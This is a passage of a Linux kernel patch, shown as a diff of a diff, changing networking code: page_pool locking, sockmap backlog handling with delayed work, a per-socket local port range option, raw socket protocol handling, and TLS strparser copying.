+ 	lock_sock(sk);
+ 
+ 	if (hci_pi(sk)->channel != HCI_CHANNEL_RAW) {
+diff --git a/net/core/page_pool.c b/net/core/page_pool.c
+index 9b203d8660e47..2396c99bedeaa 100644
+--- a/net/core/page_pool.c
++++ b/net/core/page_pool.c
+@@ -133,6 +133,29 @@ EXPORT_SYMBOL(page_pool_ethtool_stats_get);
+ #define recycle_stat_add(pool, __stat, val)
+ #endif
+ 
++static bool page_pool_producer_lock(struct page_pool *pool)
++	__acquires(&pool->ring.producer_lock)
++{
++	bool in_softirq = in_softirq();
++
++	if (in_softirq)
++		spin_lock(&pool->ring.producer_lock);
++	else
++		spin_lock_bh(&pool->ring.producer_lock);
++
++	return in_softirq;
++}
++
++static void page_pool_producer_unlock(struct page_pool *pool,
++				      bool in_softirq)
++	__releases(&pool->ring.producer_lock)
++{
++	if (in_softirq)
++		spin_unlock(&pool->ring.producer_lock);
++	else
++		spin_unlock_bh(&pool->ring.producer_lock);
++}
++
+ static int page_pool_init(struct page_pool *pool,
+ 			  const struct page_pool_params *params)
+ {
+@@ -511,8 +534,8 @@ static void page_pool_return_page(struct page_pool *pool, struct page *page)
+ static bool page_pool_recycle_in_ring(struct page_pool *pool, struct page *page)
+ {
+ 	int ret;
+-	/* BH protection not needed if current is serving softirq */
+-	if (in_serving_softirq())
++	/* BH protection not needed if current is softirq */
++	if (in_softirq())
+ 		ret = ptr_ring_produce(&pool->ring, page);
+ 	else
+ 		ret = ptr_ring_produce_bh(&pool->ring, page);
+@@ -570,7 +593,7 @@ __page_pool_put_page(struct page_pool *pool, struct page *page,
+ 			page_pool_dma_sync_for_device(pool, page,
+ 						      dma_sync_size);
+ 
+-		if (allow_direct && in_serving_softirq() &&
++		if (allow_direct && in_softirq() &&
+ 		    page_pool_recycle_in_cache(page, pool))
+ 			return NULL;
+ 
+@@ -615,6 +638,7 @@ void page_pool_put_page_bulk(struct page_pool *pool, void **data,
+ 			     int count)
+ {
+ 	int i, bulk_len = 0;
++	bool in_softirq;
+ 
+ 	for (i = 0; i < count; i++) {
+ 		struct page *page = virt_to_head_page(data[i]);
+@@ -633,7 +657,7 @@ void page_pool_put_page_bulk(struct page_pool *pool, void **data,
+ 		return;
+ 
+ 	/* Bulk producer into ptr_ring page_pool cache */
+-	page_pool_ring_lock(pool);
++	in_softirq = page_pool_producer_lock(pool);
+ 	for (i = 0; i < bulk_len; i++) {
+ 		if (__ptr_ring_produce(&pool->ring, data[i])) {
+ 			/* ring full */
+@@ -642,7 +666,7 @@ void page_pool_put_page_bulk(struct page_pool *pool, void **data,
+ 		}
+ 	}
+ 	recycle_stat_add(pool, ring, i);
+-	page_pool_ring_unlock(pool);
++	page_pool_producer_unlock(pool, in_softirq);
+ 
+ 	/* Hopefully all pages was return into ptr_ring */
+ 	if (likely(i == bulk_len))
+diff --git a/net/core/skmsg.c b/net/core/skmsg.c
+index 53d0251788aa2..9e0f694515636 100644
+--- a/net/core/skmsg.c
++++ b/net/core/skmsg.c
+@@ -480,8 +480,6 @@ int sk_msg_recvmsg(struct sock *sk, struct sk_psock *psock, struct msghdr *msg,
+ 		msg_rx = sk_psock_peek_msg(psock);
+ 	}
+ out:
+-	if (psock->work_state.skb && copied > 0)
+-		schedule_work(&psock->work);
+ 	return copied;
+ }
+ EXPORT_SYMBOL_GPL(sk_msg_recvmsg);
+@@ -623,42 +621,33 @@ static int sk_psock_handle_skb(struct sk_psock *psock, struct sk_buff *skb,
+ 
+ static void sk_psock_skb_state(struct sk_psock *psock,
+ 			       struct sk_psock_work_state *state,
+-			       struct sk_buff *skb,
+ 			       int len, int off)
+ {
+ 	spin_lock_bh(&psock->ingress_lock);
+ 	if (sk_psock_test_state(psock, SK_PSOCK_TX_ENABLED)) {
+-		state->skb = skb;
+ 		state->len = len;
+ 		state->off = off;
+-	} else {
+-		sock_drop(psock->sk, skb);
+ 	}
+ 	spin_unlock_bh(&psock->ingress_lock);
+ }
+ 
+ static void sk_psock_backlog(struct work_struct *work)
+ {
+-	struct sk_psock *psock = container_of(work, struct sk_psock, work);
++	struct delayed_work *dwork = to_delayed_work(work);
++	struct sk_psock *psock = container_of(dwork, struct sk_psock, work);
+ 	struct sk_psock_work_state *state = &psock->work_state;
+ 	struct sk_buff *skb = NULL;
++	u32 len = 0, off = 0;
+ 	bool ingress;
+-	u32 len, off;
+ 	int ret;
+ 
+ 	mutex_lock(&psock->work_mutex);
+-	if (unlikely(state->skb)) {
+-		spin_lock_bh(&psock->ingress_lock);
+-		skb = state->skb;
++	if (unlikely(state->len)) {
+ 		len = state->len;
+ 		off = state->off;
+-		state->skb = NULL;
+-		spin_unlock_bh(&psock->ingress_lock);
+ 	}
+-	if (skb)
+-		goto start;
+ 
+-	while ((skb = skb_dequeue(&psock->ingress_skb))) {
++	while ((skb = skb_peek(&psock->ingress_skb))) {
+ 		len = skb->len;
+ 		off = 0;
+ 		if (skb_bpf_strparser(skb)) {
+@@ -667,7 +656,6 @@ static void sk_psock_backlog(struct work_struct *work)
+ 			off = stm->offset;
+ 			len = stm->full_len;
+ 		}
+-start:
+ 		ingress = skb_bpf_ingress(skb);
+ 		skb_bpf_redirect_clear(skb);
+ 		do {
+@@ -677,22 +665,28 @@ start:
+ 							  len, ingress);
+ 			if (ret <= 0) {
+ 				if (ret == -EAGAIN) {
+-					sk_psock_skb_state(psock, state, skb,
+-							   len, off);
++					sk_psock_skb_state(psock, state, len, off);
++
++					/* Delay slightly to prioritize any
++					 * other work that might be here.
++					 */
++					if (sk_psock_test_state(psock, SK_PSOCK_TX_ENABLED))
++						schedule_delayed_work(&psock->work, 1);
+ 					goto end;
+ 				}
+ 				/* Hard errors break pipe and stop xmit. */
+ 				sk_psock_report_error(psock, ret ? -ret : EPIPE);
+ 				sk_psock_clear_state(psock, SK_PSOCK_TX_ENABLED);
+-				sock_drop(psock->sk, skb);
+ 				goto end;
+ 			}
+ 			off += ret;
+ 			len -= ret;
+ 		} while (len);
+ 
+-		if (!ingress)
++		skb = skb_dequeue(&psock->ingress_skb);
++		if (!ingress) {
+ 			kfree_skb(skb);
++		}
+ 	}
+ end:
+ 	mutex_unlock(&psock->work_mutex);
+@@ -733,7 +727,7 @@ struct sk_psock *sk_psock_init(struct sock *sk, int node)
+ 	INIT_LIST_HEAD(&psock->link);
+ 	spin_lock_init(&psock->link_lock);
+ 
+-	INIT_WORK(&psock->work, sk_psock_backlog);
++	INIT_DELAYED_WORK(&psock->work, sk_psock_backlog);
+ 	mutex_init(&psock->work_mutex);
+ 	INIT_LIST_HEAD(&psock->ingress_msg);
+ 	spin_lock_init(&psock->ingress_lock);
+@@ -785,11 +779,6 @@ static void __sk_psock_zap_ingress(struct sk_psock *psock)
+ 		skb_bpf_redirect_clear(skb);
+ 		sock_drop(psock->sk, skb);
+ 	}
+-	kfree_skb(psock->work_state.skb);
+-	/* We null the skb here to ensure that calls to sk_psock_backlog
+-	 * do not pick up the free'd skb.
+-	 */
+-	psock->work_state.skb = NULL;
+ 	__sk_psock_purge_ingress_msg(psock);
+ }
+ 
+@@ -808,7 +797,6 @@ void sk_psock_stop(struct sk_psock *psock)
+ 	spin_lock_bh(&psock->ingress_lock);
+ 	sk_psock_clear_state(psock, SK_PSOCK_TX_ENABLED);
+ 	sk_psock_cork_free(psock);
+-	__sk_psock_zap_ingress(psock);
+ 	spin_unlock_bh(&psock->ingress_lock);
+ }
+ 
+@@ -822,7 +810,8 @@ static void sk_psock_destroy(struct work_struct *work)
+ 
+ 	sk_psock_done_strp(psock);
+ 
+-	cancel_work_sync(&psock->work);
++	cancel_delayed_work_sync(&psock->work);
++	__sk_psock_zap_ingress(psock);
+ 	mutex_destroy(&psock->work_mutex);
+ 
+ 	psock_progs_drop(&psock->progs);
+@@ -937,7 +926,7 @@ static int sk_psock_skb_redirect(struct sk_psock *from, struct sk_buff *skb)
+ 	}
+ 
+ 	skb_queue_tail(&psock_other->ingress_skb, skb);
+-	schedule_work(&psock_other->work);
++	schedule_delayed_work(&psock_other->work, 0);
+ 	spin_unlock_bh(&psock_other->ingress_lock);
+ 	return 0;
+ }
+@@ -989,10 +978,8 @@ static int sk_psock_verdict_apply(struct sk_psock *psock, struct sk_buff *skb,
+ 		err = -EIO;
+ 		sk_other = psock->sk;
+ 		if (sock_flag(sk_other, SOCK_DEAD) ||
+-		    !sk_psock_test_state(psock, SK_PSOCK_TX_ENABLED)) {
+-			skb_bpf_redirect_clear(skb);
++		    !sk_psock_test_state(psock, SK_PSOCK_TX_ENABLED))
+ 			goto out_free;
+-		}
+ 
+ 		skb_bpf_set_ingress(skb);
+ 
+@@ -1017,22 +1004,23 @@ static int sk_psock_verdict_apply(struct sk_psock *psock, struct sk_buff *skb,
+ 			spin_lock_bh(&psock->ingress_lock);
+ 			if (sk_psock_test_state(psock, SK_PSOCK_TX_ENABLED)) {
+ 				skb_queue_tail(&psock->ingress_skb, skb);
+-				schedule_work(&psock->work);
++				schedule_delayed_work(&psock->work, 0);
+ 				err = 0;
+ 			}
+ 			spin_unlock_bh(&psock->ingress_lock);
+-			if (err < 0) {
+-				skb_bpf_redirect_clear(skb);
++			if (err < 0)
+ 				goto out_free;
+-			}
+ 		}
+ 		break;
+ 	case __SK_REDIRECT:
++		tcp_eat_skb(psock->sk, skb);
+ 		err = sk_psock_skb_redirect(psock, skb);
+ 		break;
+ 	case __SK_DROP:
+ 	default:
+ out_free:
++		skb_bpf_redirect_clear(skb);
++		tcp_eat_skb(psock->sk, skb);
+ 		sock_drop(psock->sk, skb);
+ 	}
+ 
+@@ -1048,7 +1036,7 @@ static void sk_psock_write_space(struct sock *sk)
+ 	psock = sk_psock(sk);
+ 	if (likely(psock)) {
+ 		if (sk_psock_test_state(psock, SK_PSOCK_TX_ENABLED))
+-			schedule_work(&psock->work);
++			schedule_delayed_work(&psock->work, 0);
+ 		write_space = psock->saved_write_space;
+ 	}
+ 	rcu_read_unlock();
+@@ -1077,8 +1065,7 @@ static void sk_psock_strp_read(struct strparser *strp, struct sk_buff *skb)
+ 		skb_dst_drop(skb);
+ 		skb_bpf_redirect_clear(skb);
+ 		ret = bpf_prog_run_pin_on_cpu(prog, skb);
+-		if (ret == SK_PASS)
+-			skb_bpf_set_strparser(skb);
++		skb_bpf_set_strparser(skb);
+ 		ret = sk_psock_map_verd(ret, skb_bpf_redirect_fetch(skb));
+ 		skb->sk = NULL;
+ 	}
+@@ -1180,12 +1167,11 @@ static int sk_psock_verdict_recv(struct sock *sk, struct sk_buff *skb)
+ 	int ret = __SK_DROP;
+ 	int len = skb->len;
+ 
+-	skb_get(skb);
+-
+ 	rcu_read_lock();
+ 	psock = sk_psock(sk);
+ 	if (unlikely(!psock)) {
+ 		len = 0;
++		tcp_eat_skb(sk, skb);
+ 		sock_drop(sk, skb);
+ 		goto out;
+ 	}
+@@ -1209,10 +1195,19 @@ out:
+ static void sk_psock_verdict_data_ready(struct sock *sk)
+ {
+ 	struct socket *sock = sk->sk_socket;
++	int copied;
+ 
+ 	if (unlikely(!sock || !sock->ops || !sock->ops->read_skb))
+ 		return;
+-	sock->ops->read_skb(sk, sk_psock_verdict_recv);
++	copied = sock->ops->read_skb(sk, sk_psock_verdict_recv);
++	if (copied >= 0) {
++		struct sk_psock *psock;
++
++		rcu_read_lock();
++		psock = sk_psock(sk);
++		psock->saved_data_ready(sk);
++		rcu_read_unlock();
++	}
+ }
+ 
+ void sk_psock_start_verdict(struct sock *sk, struct sk_psock *psock)
+diff --git a/net/core/sock_map.c b/net/core/sock_map.c
+index a68a7290a3b2b..d382672018928 100644
+--- a/net/core/sock_map.c
++++ b/net/core/sock_map.c
+@@ -1624,9 +1624,10 @@ void sock_map_close(struct sock *sk, long timeout)
+ 		rcu_read_unlock();
+ 		sk_psock_stop(psock);
+ 		release_sock(sk);
+-		cancel_work_sync(&psock->work);
++		cancel_delayed_work_sync(&psock->work);
+ 		sk_psock_put(sk, psock);
+ 	}
++
+ 	/* Make sure we do not recurse. This is a bug.
+ 	 * Leak the socket instead of crashing on a stack overflow.
+ 	 */
+diff --git a/net/ipv4/inet_connection_sock.c b/net/ipv4/inet_connection_sock.c
+index 7152ede18f115..916075e00d066 100644
+--- a/net/ipv4/inet_connection_sock.c
++++ b/net/ipv4/inet_connection_sock.c
+@@ -117,7 +117,7 @@ bool inet_rcv_saddr_any(const struct sock *sk)
+ 	return !sk->sk_rcv_saddr;
+ }
+ 
+-void inet_get_local_port_range(struct net *net, int *low, int *high)
++void inet_get_local_port_range(const struct net *net, int *low, int *high)
+ {
+ 	unsigned int seq;
+ 
+@@ -130,6 +130,27 @@ void inet_get_local_port_range(struct net *net, int *low, int *high)
+ }
+ EXPORT_SYMBOL(inet_get_local_port_range);
+ 
++void inet_sk_get_local_port_range(const struct sock *sk, int *low, int *high)
++{
++	const struct inet_sock *inet = inet_sk(sk);
++	const struct net *net = sock_net(sk);
++	int lo, hi, sk_lo, sk_hi;
++
++	inet_get_local_port_range(net, &lo, &hi);
++
++	sk_lo = inet->local_port_range.lo;
++	sk_hi = inet->local_port_range.hi;
++
++	if (unlikely(lo <= sk_lo && sk_lo <= hi))
++		lo = sk_lo;
++	if (unlikely(lo <= sk_hi && sk_hi <= hi))
++		hi = sk_hi;
++
++	*low = lo;
++	*high = hi;
++}
++EXPORT_SYMBOL(inet_sk_get_local_port_range);
++
+ static bool inet_use_bhash2_on_bind(const struct sock *sk)
+ {
+ #if IS_ENABLED(CONFIG_IPV6)
+@@ -316,7 +337,7 @@ inet_csk_find_open_port(const struct sock *sk, struct inet_bind_bucket **tb_ret,
+ ports_exhausted:
+ 	attempt_half = (sk->sk_reuse == SK_CAN_REUSE) ? 1 : 0;
+ other_half_scan:
+-	inet_get_local_port_range(net, &low, &high);
++	inet_sk_get_local_port_range(sk, &low, &high);
+ 	high++; /* [32768, 60999] -> [32768, 61000[ */
+ 	if (high - low < 4)
+ 		attempt_half = 0;
+diff --git a/net/ipv4/inet_hashtables.c b/net/ipv4/inet_hashtables.c
+index f0750c06d5ffc..e8734ffca85a8 100644
+--- a/net/ipv4/inet_hashtables.c
++++ b/net/ipv4/inet_hashtables.c
+@@ -1022,7 +1022,7 @@ int __inet_hash_connect(struct inet_timewait_death_row *death_row,
+ 
+ 	l3mdev = inet_sk_bound_l3mdev(sk);
+ 
+-	inet_get_local_port_range(net, &low, &high);
++	inet_sk_get_local_port_range(sk, &low, &high);
+ 	high++; /* [32768, 60999] -> [32768, 61000[ */
+ 	remaining = high - low;
+ 	if (likely(remaining > 1))
+diff --git a/net/ipv4/ip_sockglue.c b/net/ipv4/ip_sockglue.c
+index 6e19cad154f5c..a7fd035b5b4f9 100644
+--- a/net/ipv4/ip_sockglue.c
++++ b/net/ipv4/ip_sockglue.c
+@@ -317,7 +317,14 @@ int ip_cmsg_send(struct sock *sk, struct msghdr *msg, struct ipcm_cookie *ipc,
+ 			ipc->tos = val;
+ 			ipc->priority = rt_tos2priority(ipc->tos);
+ 			break;
+-
++		case IP_PROTOCOL:
++			if (cmsg->cmsg_len != CMSG_LEN(sizeof(int)))
++				return -EINVAL;
++			val = *(int *)CMSG_DATA(cmsg);
++			if (val < 1 || val > 255)
++				return -EINVAL;
++			ipc->protocol = val;
++			break;
+ 		default:
+ 			return -EINVAL;
+ 		}
+@@ -922,6 +929,7 @@ int do_ip_setsockopt(struct sock *sk, int level, int optname,
+ 	case IP_CHECKSUM:
+ 	case IP_RECVFRAGSIZE:
+ 	case IP_RECVERR_RFC4884:
++	case IP_LOCAL_PORT_RANGE:
+ 		if (optlen >= sizeof(int)) {
+ 			if (copy_from_sockptr(&val, optval, sizeof(val)))
+ 				return -EFAULT;
+@@ -1364,6 +1372,20 @@ int do_ip_setsockopt(struct sock *sk, int level, int optname,
+ 		WRITE_ONCE(inet->min_ttl, val);
+ 		break;
+ 
++	case IP_LOCAL_PORT_RANGE:
++	{
++		const __u16 lo = val;
++		const __u16 hi = val >> 16;
++
++		if (optlen != sizeof(__u32))
++			goto e_inval;
++		if (lo != 0 && hi != 0 && lo > hi)
++			goto e_inval;
++
++		inet->local_port_range.lo = lo;
++		inet->local_port_range.hi = hi;
++		break;
++	}
+ 	default:
+ 		err = -ENOPROTOOPT;
+ 		break;
+@@ -1742,6 +1764,12 @@ int do_ip_getsockopt(struct sock *sk, int level, int optname,
+ 	case IP_MINTTL:
+ 		val = inet->min_ttl;
+ 		break;
++	case IP_LOCAL_PORT_RANGE:
++		val = inet->local_port_range.hi << 16 | inet->local_port_range.lo;
++		break;
++	case IP_PROTOCOL:
++		val = inet_sk(sk)->inet_num;
++		break;
+ 	default:
+ 		sockopt_release_sock(sk);
+ 		return -ENOPROTOOPT;
+diff --git a/net/ipv4/raw.c b/net/ipv4/raw.c
+index af03aa8a8e513..86197634dcf5d 100644
+--- a/net/ipv4/raw.c
++++ b/net/ipv4/raw.c
+@@ -530,6 +530,9 @@ static int raw_sendmsg(struct sock *sk, struct msghdr *msg, size_t len)
+ 	}
+ 
+ 	ipcm_init_sk(&ipc, inet);
++	/* Keep backward compat */
++	if (hdrincl)
++		ipc.protocol = IPPROTO_RAW;
+ 
+ 	if (msg->msg_controllen) {
+ 		err = ip_cmsg_send(sk, msg, &ipc, false);
+@@ -597,7 +600,7 @@ static int raw_sendmsg(struct sock *sk, struct msghdr *msg, size_t len)
+ 
+ 	flowi4_init_output(&fl4, ipc.oif, ipc.sockc.mark, tos,
+ 			   RT_SCOPE_UNIVERSE,
+-			   hdrincl ? IPPROTO_RAW : sk->sk_protocol,
++			   hdrincl ? ipc.protocol : sk->sk_protocol,
+ 			   inet_sk_flowi_flags(sk) |
+ 			    (hdrincl ? FLOWI_FLAG_KNOWN_NH : 0),
+ 			   daddr, saddr, 0, 0, sk->sk_uid);
+diff --git a/net/ipv4/tcp.c b/net/ipv4/tcp.c
+index 1fb67f819de49..021a8bf6a1898 100644
+--- a/net/ipv4/tcp.c
++++ b/net/ipv4/tcp.c
+@@ -1570,7 +1570,7 @@ static int tcp_peek_sndq(struct sock *sk, struct msghdr *msg, int len)
+  * calculation of whether or not we must ACK for the sake of
+  * a window update.
+  */
+-static void __tcp_cleanup_rbuf(struct sock *sk, int copied)
++void __tcp_cleanup_rbuf(struct sock *sk, int copied)
+ {
+ 	struct tcp_sock *tp = tcp_sk(sk);
+ 	bool time_to_ack = false;
+@@ -1772,7 +1772,6 @@ int tcp_read_skb(struct sock *sk, skb_read_actor_t recv_actor)
+ 		WARN_ON_ONCE(!skb_set_owner_sk_safe(skb, sk));
+ 		tcp_flags = TCP_SKB_CB(skb)->tcp_flags;
+ 		used = recv_actor(sk, skb);
+-		consume_skb(skb);
+ 		if (used < 0) {
+ 			if (!copied)
+ 				copied = used;
+@@ -1786,14 +1785,6 @@ int tcp_read_skb(struct sock *sk, skb_read_actor_t recv_actor)
+ 			break;
+ 		}
+ 	}
+-	WRITE_ONCE(tp->copied_seq, seq);
+-
+-	tcp_rcv_space_adjust(sk);
+-
+-	/* Clean up data we have read: This will do ACK frames. */
+-	if (copied > 0)
+-		__tcp_cleanup_rbuf(sk, copied);
+-
+ 	return copied;
+ }
+ EXPORT_SYMBOL(tcp_read_skb);
+diff --git a/net/ipv4/tcp_bpf.c b/net/ipv4/tcp_bpf.c
+index 2e9547467edbe..5f93918c063c7 100644
+--- a/net/ipv4/tcp_bpf.c
++++ b/net/ipv4/tcp_bpf.c
+@@ -11,6 +11,24 @@
+ #include <net/inet_common.h>
+ #include <net/tls.h>
+ 
++void tcp_eat_skb(struct sock *sk, struct sk_buff *skb)
++{
++	struct tcp_sock *tcp;
++	int copied;
++
++	if (!skb || !skb->len || !sk_is_tcp(sk))
++		return;
++
++	if (skb_bpf_strparser(skb))
++		return;
++
++	tcp = tcp_sk(sk);
++	copied = tcp->copied_seq + skb->len;
++	WRITE_ONCE(tcp->copied_seq, copied);
++	tcp_rcv_space_adjust(sk);
++	__tcp_cleanup_rbuf(sk, skb->len);
++}
++
+ static int bpf_tcp_ingress(struct sock *sk, struct sk_psock *psock,
+ 			   struct sk_msg *msg, u32 apply_bytes, int flags)
+ {
+@@ -174,14 +192,34 @@ static int tcp_msg_wait_data(struct sock *sk, struct sk_psock *psock,
+ 	return ret;
+ }
+ 
++static bool is_next_msg_fin(struct sk_psock *psock)
++{
++	struct scatterlist *sge;
++	struct sk_msg *msg_rx;
++	int i;
++
++	msg_rx = sk_psock_peek_msg(psock);
++	i = msg_rx->sg.start;
++	sge = sk_msg_elem(msg_rx, i);
++	if (!sge->length) {
++		struct sk_buff *skb = msg_rx->skb;
++
++		if (skb && TCP_SKB_CB(skb)->tcp_flags & TCPHDR_FIN)
++			return true;
++	}
++	return false;
++}
++
+ static int tcp_bpf_recvmsg_parser(struct sock *sk,
+ 				  struct msghdr *msg,
+ 				  size_t len,
+ 				  int flags,
+ 				  int *addr_len)
+ {
++	struct tcp_sock *tcp = tcp_sk(sk);
++	u32 seq = tcp->copied_seq;
+ 	struct sk_psock *psock;
+-	int copied;
++	int copied = 0;
+ 
+ 	if (unlikely(flags & MSG_ERRQUEUE))
+ 		return inet_recv_error(sk, msg, len, addr_len);
+@@ -194,8 +232,43 @@ static int tcp_bpf_recvmsg_parser(struct sock *sk,
+ 		return tcp_recvmsg(sk, msg, len, flags, addr_len);
+ 
+ 	lock_sock(sk);
++
++	/* We may have received data on the sk_receive_queue pre-accept and
++	 * then we can not use read_skb in this context because we haven't
++	 * assigned a sk_socket yet so have no link to the ops. The work-around
++	 * is to check the sk_receive_queue and in these cases read skbs off
++	 * queue again. The read_skb hook is not running at this point because
++	 * of lock_sock so we avoid having multiple runners in read_skb.
++	 */
++	if (unlikely(!skb_queue_empty(&sk->sk_receive_queue))) {
++		tcp_data_ready(sk);
++		/* This handles the ENOMEM errors if we both receive data
++		 * pre accept and are already under memory pressure. At least
++		 * let user know to retry.
++		 */
++		if (unlikely(!skb_queue_empty(&sk->sk_receive_queue))) {
++			copied = -EAGAIN;
++			goto out;
++		}
++	}
++
+ msg_bytes_ready:
+ 	copied = sk_msg_recvmsg(sk, psock, msg, len, flags);
++	/* The typical case for EFAULT is the socket was gracefully
++	 * shutdown with a FIN pkt. So check here the other case is
++	 * some error on copy_page_to_iter which would be unexpected.
++	 * On fin return correct return code to zero.
++	 */
++	if (copied == -EFAULT) {
++		bool is_fin = is_next_msg_fin(psock);
++
++		if (is_fin) {
++			copied = 0;
++			seq++;
++			goto out;
++		}
++	}
++	seq += copied;
+ 	if (!copied) {
+ 		long timeo;
+ 		int data;
+@@ -233,6 +306,10 @@ msg_bytes_ready:
+ 		copied = -EAGAIN;
+ 	}
+ out:
++	WRITE_ONCE(tcp->copied_seq, seq);
++	tcp_rcv_space_adjust(sk);
++	if (copied > 0)
++		__tcp_cleanup_rbuf(sk, copied);
+ 	release_sock(sk);
+ 	sk_psock_put(sk, psock);
+ 	return copied;
+diff --git a/net/ipv4/udp.c b/net/ipv4/udp.c
+index 2eaf47e23b221..956d6797c76f3 100644
+--- a/net/ipv4/udp.c
++++ b/net/ipv4/udp.c
+@@ -243,7 +243,7 @@ int udp_lib_get_port(struct sock *sk, unsigned short snum,
+ 		int low, high, remaining;
+ 		unsigned int rand;
+ 
+-		inet_get_local_port_range(net, &low, &high);
++		inet_sk_get_local_port_range(sk, &low, &high);
+ 		remaining = (high - low) + 1;
+ 
+ 		rand = get_random_u32();
+@@ -1806,7 +1806,7 @@ EXPORT_SYMBOL(__skb_recv_udp);
+ int udp_read_skb(struct sock *sk, skb_read_actor_t recv_actor)
+ {
+ 	struct sk_buff *skb;
+-	int err, copied;
++	int err;
+ 
+ try_again:
+ 	skb = skb_recv_udp(sk, MSG_DONTWAIT, &err);
+@@ -1825,10 +1825,7 @@ try_again:
+ 	}
+ 
+ 	WARN_ON_ONCE(!skb_set_owner_sk_safe(skb, sk));
+-	copied = recv_actor(sk, skb);
+-	kfree_skb(skb);
+-
+-	return copied;
++	return recv_actor(sk, skb);
+ }
+ EXPORT_SYMBOL(udp_read_skb);
+ 
+diff --git a/net/ipv6/raw.c b/net/ipv6/raw.c
+index f44b99f7ecdcc..33852fc38ad91 100644
+--- a/net/ipv6/raw.c
++++ b/net/ipv6/raw.c
+@@ -791,7 +791,8 @@ static int rawv6_sendmsg(struct sock *sk, struct msghdr *msg, size_t len)
+ 
+ 		if (!proto)
+ 			proto = inet->inet_num;
+-		else if (proto != inet->inet_num)
++		else if (proto != inet->inet_num &&
++			 inet->inet_num != IPPROTO_RAW)
+ 			return -EINVAL;
+ 
+ 		if (proto > 255)
+diff --git a/net/netfilter/nf_conntrack_netlink.c b/net/netfilter/nf_conntrack_netlink.c
+index cb4325b8ebb11..857cddd9d82e5 100644
+--- a/net/netfilter/nf_conntrack_netlink.c
++++ b/net/netfilter/nf_conntrack_netlink.c
+@@ -1559,9 +1559,6 @@ static const struct nla_policy ct_nla_policy[CTA_MAX+1] = {
+ 
+ static int ctnetlink_flush_iterate(struct nf_conn *ct, void *data)
+ {
+-	if (test_bit(IPS_OFFLOAD_BIT, &ct->status))
+-		return 0;
+-
+ 	return ctnetlink_filter_match(ct, data);
+ }
+ 
+@@ -1631,11 +1628,6 @@ static int ctnetlink_del_conntrack(struct sk_buff *skb,
+ 
+ 	ct = nf_ct_tuplehash_to_ctrack(h);
+ 
+-	if (test_bit(IPS_OFFLOAD_BIT, &ct->status)) {
+-		nf_ct_put(ct);
+-		return -EBUSY;
+-	}
+-
+ 	if (cda[CTA_ID]) {
+ 		__be32 id = nla_get_be32(cda[CTA_ID]);
+ 
+diff --git a/net/sctp/socket.c b/net/sctp/socket.c
+index 17185200079d5..bc3d08bd7cef3 100644
+--- a/net/sctp/socket.c
++++ b/net/sctp/socket.c
+@@ -8325,7 +8325,7 @@ static int sctp_get_port_local(struct sock *sk, union sctp_addr *addr)
+ 		int low, high, remaining, index;
+ 		unsigned int rover;
+ 
+-		inet_get_local_port_range(net, &low, &high);
++		inet_sk_get_local_port_range(sk, &low, &high);
+ 		remaining = (high - low) + 1;
+ 		rover = prandom_u32_max(remaining) + low;
+ 
+diff --git a/net/tls/tls.h b/net/tls/tls.h
+index 0e840a0c3437b..17737a65c643a 100644
+--- a/net/tls/tls.h
++++ b/net/tls/tls.h
+@@ -165,6 +165,11 @@ static inline bool tls_strp_msg_ready(struct tls_sw_context_rx *ctx)
+ 	return ctx->strp.msg_ready;
+ }
+ 
++static inline bool tls_strp_msg_mixed_decrypted(struct tls_sw_context_rx *ctx)
++{
++	return ctx->strp.mixed_decrypted;
++}
++
+ #ifdef CONFIG_TLS_DEVICE
+ int tls_device_init(void);
+ void tls_device_cleanup(void);
+diff --git a/net/tls/tls_device.c b/net/tls/tls_device.c
+index a7cc4f9faac28..bf69c9d6d06c0 100644
+--- a/net/tls/tls_device.c
++++ b/net/tls/tls_device.c
+@@ -1007,20 +1007,14 @@ int tls_device_decrypted(struct sock *sk, struct tls_context *tls_ctx)
+ 	struct tls_sw_context_rx *sw_ctx = tls_sw_ctx_rx(tls_ctx);
+ 	struct sk_buff *skb = tls_strp_msg(sw_ctx);
+ 	struct strp_msg *rxm = strp_msg(skb);
+-	int is_decrypted = skb->decrypted;
+-	int is_encrypted = !is_decrypted;
+-	struct sk_buff *skb_iter;
+-	int left;
+-
+-	left = rxm->full_len - skb->len;
+-	/* Check if all the data is decrypted already */
+-	skb_iter = skb_shinfo(skb)->frag_list;
+-	while (skb_iter && left > 0) {
+-		is_decrypted &= skb_iter->decrypted;
+-		is_encrypted &= !skb_iter->decrypted;
+-
+-		left -= skb_iter->len;
+-		skb_iter = skb_iter->next;
++	int is_decrypted, is_encrypted;
++
++	if (!tls_strp_msg_mixed_decrypted(sw_ctx)) {
++		is_decrypted = skb->decrypted;
++		is_encrypted = !is_decrypted;
++	} else {
++		is_decrypted = 0;
++		is_encrypted = 0;
+ 	}
+ 
+ 	trace_tls_device_decrypted(sk, tcp_sk(sk)->copied_seq - rxm->full_len,
+diff --git a/net/tls/tls_strp.c b/net/tls/tls_strp.c
+index 955ac3e0bf4d3..da95abbb7ea32 100644
+--- a/net/tls/tls_strp.c
++++ b/net/tls/tls_strp.c
+@@ -29,34 +29,50 @@ static void tls_strp_anchor_free(struct tls_strparser *strp)
+ 	struct skb_shared_info *shinfo = skb_shinfo(strp->anchor);
+ 
+ 	DEBUG_NET_WARN_ON_ONCE(atomic_read(&shinfo->dataref) != 1);
+-	shinfo->frag_list = NULL;
++	if (!strp->copy_mode)
++		shinfo->frag_list = NULL;
+ 	consume_skb(strp->anchor);
+ 	strp->anchor = NULL;
+ }
+ 
+-/* Create a new skb with the contents of input copied to its page frags */
+-static struct sk_buff *tls_strp_msg_make_copy(struct tls_strparser *strp)
++static struct sk_buff *
++tls_strp_skb_copy(struct tls_strparser *strp, struct sk_buff *in_skb,
++		  int offset, int len)
+ {
+-	struct strp_msg *rxm;
+ 	struct sk_buff *skb;
+-	int i, err, offset;
++	int i, err;
+ 
+-	skb = alloc_skb_with_frags(0, strp->stm.full_len, TLS_PAGE_ORDER,
++	skb = alloc_skb_with_frags(0, len, TLS_PAGE_ORDER,
+ 				   &err, strp->sk->sk_allocation);
+ 	if (!skb)
+ 		return NULL;
+ 
+-	offset = strp->stm.offset;
+ 	for (i = 0; i < skb_shinfo(skb)->nr_frags; i++) {
+ 		skb_frag_t *frag = &skb_shinfo(skb)->frags[i];
+ 
+-		WARN_ON_ONCE(skb_copy_bits(strp->anchor, offset,
++		WARN_ON_ONCE(skb_copy_bits(in_skb, offset,
+ 					   skb_frag_address(frag),
+ 					   skb_frag_size(frag)));
+ 		offset += skb_frag_size(frag);
+ 	}
+ 
+-	skb_copy_header(skb, strp->anchor);
++	skb->len = len;
++	skb->data_len = len;
++	skb_copy_header(skb, in_skb);
